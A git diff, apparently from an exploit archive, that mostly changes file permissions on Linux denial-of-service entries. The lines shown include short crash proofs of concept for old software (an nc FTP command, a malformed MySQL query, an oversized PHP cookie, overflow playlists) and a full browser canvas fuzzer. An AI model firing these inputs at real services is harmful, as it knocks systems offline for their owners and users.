100644 diff --git a/platforms/linux/dos/27670.txt b/platforms/linux/dos/27670.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27723.txt b/platforms/linux/dos/27723.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27762.txt b/platforms/linux/dos/27762.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27764.txt b/platforms/linux/dos/27764.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27765.txt b/platforms/linux/dos/27765.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27778.txt b/platforms/linux/dos/27778.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27791.txt b/platforms/linux/dos/27791.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27856.txt b/platforms/linux/dos/27856.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27875.c b/platforms/linux/dos/27875.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27903.txt b/platforms/linux/dos/27903.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27925.txt b/platforms/linux/dos/27925.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27981.c b/platforms/linux/dos/27981.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28026.txt b/platforms/linux/dos/28026.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28077.txt b/platforms/linux/dos/28077.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28160.txt b/platforms/linux/dos/28160.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28220.txt b/platforms/linux/dos/28220.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28234.txt b/platforms/linux/dos/28234.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28257.txt b/platforms/linux/dos/28257.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28338.txt b/platforms/linux/dos/28338.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28348.txt b/platforms/linux/dos/28348.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28358.txt b/platforms/linux/dos/28358.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28367.txt b/platforms/linux/dos/28367.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28380.txt b/platforms/linux/dos/28380.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28383.txt b/platforms/linux/dos/28383.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28384.txt b/platforms/linux/dos/28384.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28386.txt b/platforms/linux/dos/28386.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28391.html b/platforms/linux/dos/28391.html old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28683.txt b/platforms/linux/dos/28683.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28816.txt b/platforms/linux/dos/28816.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28895.txt b/platforms/linux/dos/28895.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/28912.txt b/platforms/linux/dos/28912.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/29296.txt b/platforms/linux/dos/29296.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/29399.txt b/platforms/linux/dos/29399.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/29458.txt b/platforms/linux/dos/29458.txt old mode 100755 new mode 100644 index 5052d92de..7adabfa43 --- a/platforms/linux/dos/29458.txt +++ b/platforms/linux/dos/29458.txt @@ -12,4 +12,4 @@ export dir=$(perl -e " print 's/'x1000;") mkdir -p $dir cp /bin/sleep $dir $dir/sleep 100 & -gnome-system-monitor \ No newline at end of file +gnome-system-monitor \ No newline at end of file diff --git a/platforms/linux/dos/29470.txt b/platforms/linux/dos/29470.txt old mode 100755 new mode 100644 index f58ec16a0..de501d312 --- a/platforms/linux/dos/29470.txt +++ b/platforms/linux/dos/29470.txt @@ -9,4 +9,4 @@ Oftpd Server 0.3.7 is reported vulnerable; other versions may also be affected. nc www.example.com 21 <<< "LPRT 1,16,63,254,47,0,0,32,0,0,0,0,0,0,32,254,143,205,2,141,176" 220 Service ready for new user. -521 Only IPv4 supported, address family (4) \ No newline at end of file +521 Only IPv4 supported, address family (4) \ No newline at end of file diff --git a/platforms/linux/dos/29473.txt b/platforms/linux/dos/29473.txt old mode 100755 new mode 100644 index f943016f2..7cf503555 --- a/platforms/linux/dos/29473.txt +++ b/platforms/linux/dos/29473.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash affected pro Squid versions from 2.5.STABLE11 to 2.6.STABLE6 are vulnerable to this issue. -ftp://www.example.com/sample/directory;type=d \ No newline at end of file +ftp://www.example.com/sample/directory;type=d \ No newline at end of file diff --git a/platforms/linux/dos/29520.txt b/platforms/linux/dos/29520.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/2954.html b/platforms/linux/dos/2954.html old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/29683.txt b/platforms/linux/dos/29683.txt old mode 100755 new mode 100644 index f2b30852f..da839ef56 --- a/platforms/linux/dos/29683.txt +++ b/platforms/linux/dos/29683.txt @@ -7,4 +7,4 @@ A local attacker can exploit this issue to crash the kernel. Linux kernel versions 2.6.x are vulnerable to this issue. 1. auditctl -w /etc/shadow -2. useradd userb \ No newline at end of file +2. useradd userb \ No newline at end of file diff --git a/platforms/linux/dos/29713.html b/platforms/linux/dos/29713.html old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/29716.txt b/platforms/linux/dos/29716.txt old mode 100755 new mode 100644 index 52bb866c1..b2b64a64a --- a/platforms/linux/dos/29716.txt +++ b/platforms/linux/dos/29716.txt @@ -9,4 +9,4 @@ This issue affects version 1.0.2; other versions may also be affected. The following proof of concept demonstrates this issue: connect yourserver -join nonexistent -hmac nonexistent \ No newline at end of file +join nonexistent -hmac nonexistent \ No newline at end of file diff --git a/platforms/linux/dos/29717.txt b/platforms/linux/dos/29717.txt old mode 100755 new mode 100644 index 870ea9134..80c3cef8c --- a/platforms/linux/dos/29717.txt +++ b/platforms/linux/dos/29717.txt @@ -13,4 +13,4 @@ perl -e 'print "a"x1200' | nc -l -p 1700 -v -v -n conquest -m -M 127.0.0.1 3. Interrupt the fake metaserver: conquest should have been crashed -trying to executing the code at offset 0x61616161 \ No newline at end of file +trying to executing the code at offset 0x61616161 \ No newline at end of file diff --git a/platforms/linux/dos/29720.txt b/platforms/linux/dos/29720.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/29723.txt b/platforms/linux/dos/29723.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/29724.txt b/platforms/linux/dos/29724.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/29781.c b/platforms/linux/dos/29781.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/29809.txt b/platforms/linux/dos/29809.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/29826.txt b/platforms/linux/dos/29826.txt old mode 100755 new mode 100644 index 2781a73e5..496e69f0a --- a/platforms/linux/dos/29826.txt +++ b/platforms/linux/dos/29826.txt @@ -29,4 +29,4 @@ AA AA 03 0C 0D 0E 0F 10 11 12 13 14 -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/dos/29916.c b/platforms/linux/dos/29916.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/29939.txt b/platforms/linux/dos/29939.txt old mode 100755 new mode 100644 index 41c7fc51c..98cbb1477 --- a/platforms/linux/dos/29939.txt +++ b/platforms/linux/dos/29939.txt @@ -37,4 +37,4 @@ pTraps[2].left.p2.y = 13272; pTraps[2].right.p1.x = 54806; pTraps[2].right.p1.y = 46200; pTraps[2].right.p2.x = 5052; -pTraps[2].right.p2.y = 22005; \ No newline at end of file +pTraps[2].right.p2.y = 22005; \ No newline at end of file diff --git a/platforms/linux/dos/30020.txt b/platforms/linux/dos/30020.txt old mode 100755 new mode 100644 index 7c536d8f1..b64023d3b --- a/platforms/linux/dos/30020.txt +++ b/platforms/linux/dos/30020.txt @@ -8,4 +8,4 @@ NOTE: An attacker must be able to execute arbitrary SELECT statements against th Versions prior to MySQL 5.0.40 are vulnerable. -SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0))); \ No newline at end of file +SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0))); \ No newline at end of file diff --git a/platforms/linux/dos/30024.txt b/platforms/linux/dos/30024.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30080.c b/platforms/linux/dos/30080.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30110.c b/platforms/linux/dos/30110.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/3023.c b/platforms/linux/dos/3023.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30251.c b/platforms/linux/dos/30251.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30430.txt b/platforms/linux/dos/30430.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30444.txt b/platforms/linux/dos/30444.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30542.txt b/platforms/linux/dos/30542.txt old mode 100755 new mode 100644 index 6b413c391..ccacc8446 --- a/platforms/linux/dos/30542.txt +++ b/platforms/linux/dos/30542.txt @@ -53,4 +53,4 @@ ds 0x7b 123 es 0x7b 123 fs 0x0 0 -The complete database server (droping all active conections) crashes. \ No newline at end of file +The complete database server (droping all active conections) crashes. \ No newline at end of file diff --git a/platforms/linux/dos/30578.txt b/platforms/linux/dos/30578.txt old mode 100755 new mode 100644 index 2186a45a1..b7058ad52 --- a/platforms/linux/dos/30578.txt +++ b/platforms/linux/dos/30578.txt @@ -15,4 +15,4 @@ indx truck size 0xffffff00 wLongsPerEntry 0x0001 BIndexSubType is 0x64 bIndexType is 0x73 -nEntriesInuse is 0x10000020 \ No newline at end of file +nEntriesInuse is 0x10000020 \ No newline at end of file diff --git a/platforms/linux/dos/30579.txt b/platforms/linux/dos/30579.txt old mode 100755 new mode 100644 index b68a58d2c..a5c304fa0 --- a/platforms/linux/dos/30579.txt +++ b/platforms/linux/dos/30579.txt @@ -29,4 +29,4 @@ indx truck size 0xffffff00 wLongsPerEntry 0x0001 BIndexSubType is 0x64 bIndexType is 0x73 -nEntriesInuse is 0x10000020 \ No newline at end of file +nEntriesInuse is 0x10000020 \ No newline at end of file diff --git a/platforms/linux/dos/30580.txt b/platforms/linux/dos/30580.txt old mode 100755 new mode 100644 index b617c31fd..35e368854 --- a/platforms/linux/dos/30580.txt +++ b/platforms/linux/dos/30580.txt @@ -34,4 +34,4 @@ indx truck size 0xffffff00 wLongsPerEntry 0x0001 BIndexSubType is 0x64 bIndexType is 0x73 -nEntriesInuse is 0x10000020 \ No newline at end of file +nEntriesInuse is 0x10000020 \ No newline at end of file diff --git a/platforms/linux/dos/306.c b/platforms/linux/dos/306.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30646.txt b/platforms/linux/dos/30646.txt old mode 100755 new mode 100644 index dfada5842..575dc1e21 --- a/platforms/linux/dos/30646.txt +++ b/platforms/linux/dos/30646.txt @@ -18,4 +18,4 @@ oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong. loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo oong.looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo ooooooong.loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo -oooooooooooong.host-name.example.com/ \ No newline at end of file +oooooooooooong.host-name.example.com/ \ No newline at end of file diff --git a/platforms/linux/dos/30648.txt b/platforms/linux/dos/30648.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30724.txt b/platforms/linux/dos/30724.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30744.txt b/platforms/linux/dos/30744.txt old mode 100755 new mode 100644 index 0dba485a6..321cbc80a --- a/platforms/linux/dos/30744.txt +++ b/platforms/linux/dos/30744.txt @@ -19,4 +19,4 @@ mysql> ALTER TABLE test ADD INDEX (foo(100)); Query OK, 0 rows affected Records: 0 Duplicates: 0 Warnings: 0 -mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); \ No newline at end of file +mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); \ No newline at end of file diff --git a/platforms/linux/dos/30763.php b/platforms/linux/dos/30763.php old mode 100755 new mode 100644 index c3a5e3145..dcd61d51f --- a/platforms/linux/dos/30763.php +++ b/platforms/linux/dos/30763.php @@ -9,4 +9,4 @@ Konqueror 3.5.6 is vulnerable; other versions may also be affected. <?php ini_set("memory_limit","200M"); setcookie("hi_fox", str_repeat("A",19999999)); -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/linux/dos/30766.c b/platforms/linux/dos/30766.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30776.txt b/platforms/linux/dos/30776.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30837.txt b/platforms/linux/dos/30837.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30894.txt b/platforms/linux/dos/30894.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30902.c b/platforms/linux/dos/30902.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30942.c b/platforms/linux/dos/30942.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/30956.txt b/platforms/linux/dos/30956.txt old mode 100755 new mode 100644 index f9126bd75..0e53f6b45 --- a/platforms/linux/dos/30956.txt +++ b/platforms/linux/dos/30956.txt @@ -8,4 +8,4 @@ Successfully exploiting this issue allows remote attackers to execute arbitrary CoolPlayer 217 is vulnerable; other versions may also be affected. -vorbiscomment -t cTag=AAA_2500_A's_AAA -a input.ogg output.ogg \ No newline at end of file +vorbiscomment -t cTag=AAA_2500_A's_AAA -a input.ogg output.ogg \ No newline at end of file diff --git a/platforms/linux/dos/30985.txt b/platforms/linux/dos/30985.txt old mode 100755 new mode 100644 index 569ae29a2..868a9ce39 --- a/platforms/linux/dos/30985.txt +++ b/platforms/linux/dos/30985.txt @@ -12,4 +12,4 @@ Steps to Reproduce: 1. mkdir -p tmp/dir1 2. echo file_with_really_really_long_silly_name_to_test_iso_info_buffer 3. mkisofs -J -R -volid My_Image -o test.iso tmp -4. iso-info -l test.iso \ No newline at end of file +4. iso-info -l test.iso \ No newline at end of file diff --git a/platforms/linux/dos/31002.txt b/platforms/linux/dos/31002.txt old mode 100755 new mode 100644 index 3e3f86116..3f2bf6f63 --- a/platforms/linux/dos/31002.txt +++ b/platforms/linux/dos/31002.txt @@ -10,4 +10,4 @@ The following proof-of-concept SDP data is available: a=Abstract:buffer;'QUFBQUFBQUFBQUFBQUFB...40000_of_QUFBQUFB's...FBQUFB' -When decoding 'QUFBQUFB', the portion will be decoded to 'AAAAAA'. \ No newline at end of file +When decoding 'QUFBQUFB', the portion will be decoded to 'AAAAAA'. \ No newline at end of file diff --git a/platforms/linux/dos/31018.txt b/platforms/linux/dos/31018.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/31054.txt b/platforms/linux/dos/31054.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/31218.txt b/platforms/linux/dos/31218.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/31305.c b/platforms/linux/dos/31305.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/31440.txt b/platforms/linux/dos/31440.txt old mode 100755 new mode 100644 index 0d1432316..118a37fdb --- a/platforms/linux/dos/31440.txt +++ b/platforms/linux/dos/31440.txt @@ -35,4 +35,4 @@ m=audio 5000 RTP/AVP 0 a=rtpmap:0 PCMU/8000 [... repeat this line ...] a=rtpmap:4 G723/8000/1 -a=rtpmap:97 telephone-event/8000 \ No newline at end of file +a=rtpmap:97 telephone-event/8000 \ No newline at end of file diff --git a/platforms/linux/dos/31444.txt b/platforms/linux/dos/31444.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/31552.txt b/platforms/linux/dos/31552.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/31553.txt b/platforms/linux/dos/31553.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/31554.txt b/platforms/linux/dos/31554.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/31594.html b/platforms/linux/dos/31594.html old mode 100755 new mode 100644 index da23dfc33..99efe452c --- a/platforms/linux/dos/31594.html +++ b/platforms/linux/dos/31594.html @@ -6,4 +6,4 @@ These issues lead to memory corruption and may result in remote unauthorized acc Versions prior to Opera 9.27 are vulnerable. -<body> <font face="arial,helvetica"> <font size=+3><code><CANVAS></code> fuzzer</font><font size=-1> by <a href="mailto:lcamtuf@coredump.cx">lcamtuf@coredump.cx</a></font><p> <div id=ccont> <canvas id=canvas height=200 width=300 style="border: 1px solid teal"></canvas> </div> <img id=image src="envelope.gif" align=top> <p> <input type=checkbox id=dealloc> Deallocate canvas after every cycle (NULL ptr in Safari, likely exploitable in Opera)<br> <input type=checkbox id=keep_ctx> Keep context (if combined with above, NULL ptr Firefox, likely exploitable in Opera)<br> <input type=checkbox id=scale_large> Use large canvas scaling (likely exploitable in Opera, bogs down Firefox)<br> <input type=checkbox id=return_undef> Return <code>undefined</code> values (NULL ptr Safari, may hang Opera)<br> <input type=checkbox id=return_large> Return large integers (exploitable crash in Safari, OOM/DoS elsewhere)<br> <input type=checkbox id=quick> Skip time-consuming operations (quicker, but may miss issues)<p> <input type=submit value="Begin tests" id=button onclick="setup_all()"><p> <script> var ctx; /* Canvas context */ var imgObj; /* Reference image */ var scval = 1; var transval = 0; var quick; var dealloc; var return_undef; var return_large; var scale_large; var keep_ctx; var iht; function setup_all() { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); imgObj = document.getElementById('image'); iht = document.getElementById('ccont').innerHTML; quick = document.getElementById('quick').checked; dealloc = document.getElementById('dealloc').checked; return_undef = document.getElementById('return_undef').checked; return_large = document.getElementById('return_large').checked; scale_large = document.getElementById('scale_large').checked; keep_ctx = document.getElementById('keep_ctx').checked; document.getElementById('button').disabled = true; setInterval('do_fuzz();',1); } function R(x) { return Math.floor(Math.random() * x); } function make_number() { var v; var sel; if (return_large == true && R(3) == 1) sel = R(6); else sel = R(4); if (return_undef == false && sel == 0) sel = 1; if (R(2) == 1) v = R(100); else switch (sel) { case 0: break; case 1: v = 0; break; case 2: v = 0.000001; break; case 3: v = 10000; break; case 4: v = 2000000000; break; case 5: v = 1e100; break; } if (R(4) == 1) v = -v; return v; } function make_color() { if (R(2) == 1) return "#C0F0A0"; else return "#000090"; } function make_fill() { var sel; if (quick == true) sel = 0; else sel = R(6); switch (sel) { case 0: case 1: case 2: return make_color(); break; case 3: var r = ctx.createLinearGradient(make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 4: var r = ctx.createRadialGradient(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 5: var r = ctx.createPattern(imgObj,"repeat"); if (R(6) == 0) r.addColorStop(make_number(),make_color()); return r; break; } } function do_fuzz() { if (dealloc == true) document.getElementById('ccont').innerHTML = iht; if (keep_ctx == false) { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); } for (i=0;i<100;i++) { try { switch (R(33)) { case 0: ctx.fillStyle = make_fill(); break; case 1: ctx.globalAlpha = Math.random() - .5; break; case 2: switch (R(3)) { case 0: ctx.globalCompositeOperation = 'copy'; break; case 1: ctx.globalCompositeOperation = 'xor'; break; case 2: ctx.globalCompositeOperation = 'source-over'; break; } break; case 3: switch (R(2)) { case 0: ctx.lineCap = 'round'; break; case 1: ctx.lineCap = 'butt'; break; } break; case 4: switch (R(2)) { case 0: ctx.lineJoin = 'round'; break; case 1: ctx.lineJoin = 'miter'; break; } break; case 5: ctx.lineWidth = make_number(); break; case 6: ctx.miterLimit = make_number(); break; case 7: if (quick == true) break; ctx.shadowBlur = make_number(); break; case 8: if (quick == true) break; ctx.shadowColor = make_fill(); break; case 9: if (quick == true) break; ctx.shadowOffsetX = make_number(); ctx.shadowOffsetY = make_number(); break; case 10: ctx.restore(); break; case 11: ctx.rotate(make_number()); break; case 12: ctx.save(); break; case 13: ctx.scale(-1,-1); break; case 14: if (quick == true) break; if (transval == 0) { transval = make_number(); ctx.translate(transval,0); } else { ctx.translate(-transval,0); transval = 0; } break; case 15: ctx.clearRect(make_number(),make_number(),make_number(),make_number()); break; case 16: if (quick == true) break; ctx.drawImage(imgObj,make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 17: ctx.fillRect(make_number(),make_number(),make_number(),make_number()); break; case 18: ctx.beginPath(); break; case 19: // ctx.clip() is evil. break; case 20: ctx.closePath(); break; case 21: ctx.fill(); break; case 22: ctx.stroke(); break; case 23: ctx.strokeRect(make_number(),make_number(),make_number(),make_number()); break; case 24: if (quick == true) break; ctx.arc(make_number(),make_number(),make_number(),make_number(),make_number(),true); break; case 25: if (quick == true) break; ctx.arcTo(make_number(),make_number(),make_number(),make_number(),make_number()); break; case 26: if (quick == true) break; ctx.bezierCurveTo(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 27: ctx.lineTo(make_number(),make_number()); break; case 28: ctx.moveTo(make_number(),make_number()); break; case 29: if (quick == true) break; ctx.quadraticCurveTo(make_number(),make_number(),make_number(),make_number()); break; case 30: if (quick == true) break; ctx.transform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 31: if (quick == true) break; ctx.setTransform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 32: if (scale_large == true) { switch (scval) { case 0: ctx.scale(-1000000000,1); ctx.scale(-1000000000,1); scval = 1; break; case 1: ctx.scale(-.000000001,1); scval = 2; break; case 1: ctx.scale(-.000000001,1); scval = 0; break; } } break; } } catch (e) { } } } </script> \ No newline at end of file +<body> <font face="arial,helvetica"> <font size=+3><code><CANVAS></code> fuzzer</font><font size=-1> by <a href="mailto:lcamtuf@coredump.cx">lcamtuf@coredump.cx</a></font><p> <div id=ccont> <canvas id=canvas height=200 width=300 style="border: 1px solid teal"></canvas> </div> <img id=image src="envelope.gif" align=top> <p> <input type=checkbox id=dealloc> Deallocate canvas after every cycle (NULL ptr in Safari, likely exploitable in Opera)<br> <input type=checkbox id=keep_ctx> Keep context (if combined with above, NULL ptr Firefox, likely exploitable in Opera)<br> <input type=checkbox id=scale_large> Use large canvas scaling (likely exploitable in Opera, bogs down Firefox)<br> <input type=checkbox id=return_undef> Return <code>undefined</code> values (NULL ptr Safari, may hang Opera)<br> <input type=checkbox id=return_large> Return large integers (exploitable crash in Safari, OOM/DoS elsewhere)<br> <input type=checkbox id=quick> Skip time-consuming operations (quicker, but may miss issues)<p> <input type=submit value="Begin tests" id=button onclick="setup_all()"><p> <script> var ctx; /* Canvas context */ var imgObj; /* Reference image */ var scval = 1; var transval = 0; var quick; var dealloc; var return_undef; var return_large; var scale_large; var keep_ctx; var iht; function setup_all() { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); imgObj = document.getElementById('image'); iht = document.getElementById('ccont').innerHTML; quick = document.getElementById('quick').checked; dealloc = document.getElementById('dealloc').checked; return_undef = document.getElementById('return_undef').checked; return_large = document.getElementById('return_large').checked; scale_large = document.getElementById('scale_large').checked; keep_ctx = document.getElementById('keep_ctx').checked; document.getElementById('button').disabled = true; setInterval('do_fuzz();',1); } function R(x) { return Math.floor(Math.random() * x); } function make_number() { var v; var sel; if (return_large == true && R(3) == 1) sel = R(6); else sel = R(4); if (return_undef == false && sel == 0) sel = 1; if (R(2) == 1) v = R(100); else switch (sel) { case 0: break; case 1: v = 0; break; case 2: v = 0.000001; break; case 3: v = 10000; break; case 4: v = 2000000000; break; case 5: v = 1e100; break; } if (R(4) == 1) v = -v; return v; } function make_color() { if (R(2) == 1) return "#C0F0A0"; else return "#000090"; } function make_fill() { var sel; if (quick == true) sel = 0; else sel = R(6); switch (sel) { case 0: case 1: case 2: return make_color(); break; case 3: var r = ctx.createLinearGradient(make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 4: var r = ctx.createRadialGradient(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 5: var r = ctx.createPattern(imgObj,"repeat"); if (R(6) == 0) r.addColorStop(make_number(),make_color()); return r; break; } } function do_fuzz() { if (dealloc == true) document.getElementById('ccont').innerHTML = iht; if (keep_ctx == false) { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); } for (i=0;i<100;i++) { try { switch (R(33)) { case 0: ctx.fillStyle = make_fill(); break; case 1: ctx.globalAlpha = Math.random() - .5; break; case 2: switch (R(3)) { case 0: ctx.globalCompositeOperation = 'copy'; break; case 1: ctx.globalCompositeOperation = 'xor'; break; case 2: ctx.globalCompositeOperation = 'source-over'; break; } break; case 3: switch (R(2)) { case 0: ctx.lineCap = 'round'; break; case 1: ctx.lineCap = 'butt'; break; } break; case 4: switch (R(2)) { case 0: ctx.lineJoin = 'round'; break; case 1: ctx.lineJoin = 'miter'; break; } break; case 5: ctx.lineWidth = make_number(); break; case 6: ctx.miterLimit = make_number(); break; case 7: if (quick == true) break; ctx.shadowBlur = make_number(); break; case 8: if (quick == true) break; ctx.shadowColor = make_fill(); break; case 9: if (quick == true) break; ctx.shadowOffsetX = make_number(); ctx.shadowOffsetY = make_number(); break; case 10: ctx.restore(); break; case 11: ctx.rotate(make_number()); break; case 12: ctx.save(); break; case 13: ctx.scale(-1,-1); break; case 14: if (quick == true) break; if (transval == 0) { transval = make_number(); ctx.translate(transval,0); } else { ctx.translate(-transval,0); transval = 0; } break; case 15: ctx.clearRect(make_number(),make_number(),make_number(),make_number()); break; case 16: if (quick == true) break; ctx.drawImage(imgObj,make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 17: ctx.fillRect(make_number(),make_number(),make_number(),make_number()); break; case 18: ctx.beginPath(); break; case 19: // ctx.clip() is evil. break; case 20: ctx.closePath(); break; case 21: ctx.fill(); break; case 22: ctx.stroke(); break; case 23: ctx.strokeRect(make_number(),make_number(),make_number(),make_number()); break; case 24: if (quick == true) break; ctx.arc(make_number(),make_number(),make_number(),make_number(),make_number(),true); break; case 25: if (quick == true) break; ctx.arcTo(make_number(),make_number(),make_number(),make_number(),make_number()); break; case 26: if (quick == true) break; ctx.bezierCurveTo(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 27: ctx.lineTo(make_number(),make_number()); break; case 28: ctx.moveTo(make_number(),make_number()); break; case 29: if (quick == true) break; ctx.quadraticCurveTo(make_number(),make_number(),make_number(),make_number()); break; case 30: if (quick == true) break; ctx.transform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 31: if (quick == true) break; ctx.setTransform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 32: if (scale_large == true) { switch (scval) { case 0: ctx.scale(-1000000000,1); ctx.scale(-1000000000,1); scval = 1; break; case 1: ctx.scale(-.000000001,1); scval = 2; break; case 1: ctx.scale(-.000000001,1); scval = 0; break; } } break; } } catch (e) { } } } </script> \ No newline at end of file diff --git a/platforms/linux/dos/31761.txt b/platforms/linux/dos/31761.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/31815.html b/platforms/linux/dos/31815.html old mode 100755 new mode 100644 index f6feae71f..80cdfbe27 --- a/platforms/linux/dos/31815.html +++ b/platforms/linux/dos/31815.html @@ -15,4 +15,4 @@ match="html/body/table/tr/td/div/div/div/div/div/div/div/div/table/tr/td/table/t <found/> </xsl:if> </xsl:template> -</xsl:stylesheet> \ No newline at end of file +</xsl:stylesheet> \ No newline at end of file diff --git a/platforms/linux/dos/31965.c b/platforms/linux/dos/31965.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/31966.c b/platforms/linux/dos/31966.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/31968.txt b/platforms/linux/dos/31968.txt old mode 100755 new mode 100644 index 86177e918..b89451f48 --- a/platforms/linux/dos/31968.txt +++ b/platforms/linux/dos/31968.txt @@ -9,4 +9,4 @@ GNOME Rhythmbox 0.11.5 is vulnerable; other versions may also be affected. [playlist] X-GNOME-Title= Title= A * 1475 -NumberOfEntries=0 \ No newline at end of file +NumberOfEntries=0 \ No newline at end of file diff --git a/platforms/linux/dos/31979.html b/platforms/linux/dos/31979.html old mode 100755 new mode 100644 index eba24af9c..71494b5ca --- a/platforms/linux/dos/31979.html +++ b/platforms/linux/dos/31979.html @@ -6,4 +6,4 @@ Successful attacks will crash the application. Evolution 2.22.2 is vulnerable; other versions may also be affected. -<IFRAME SRC="A"></IFRAME> <FRAMESET><FRAME SRC="A"></FRAMESET> \ No newline at end of file +<IFRAME SRC="A"></IFRAME> <FRAMESET><FRAME SRC="A"></FRAMESET> \ No newline at end of file diff --git a/platforms/linux/dos/31984.txt b/platforms/linux/dos/31984.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/32000.txt b/platforms/linux/dos/32000.txt old mode 100755 new mode 100644 index a05aea59f..de81d913b --- a/platforms/linux/dos/32000.txt +++ b/platforms/linux/dos/32000.txt @@ -7,4 +7,4 @@ Attackers can exploit this issue to deny service to legitimate users by crashing OpenLDAP 2.3.41 is vulnerable to this issue; earlier versions back to approximately 2.1.18 as well as newer versions may also be affected. slapd -h ldap:// -d511 & -perl -e 'print 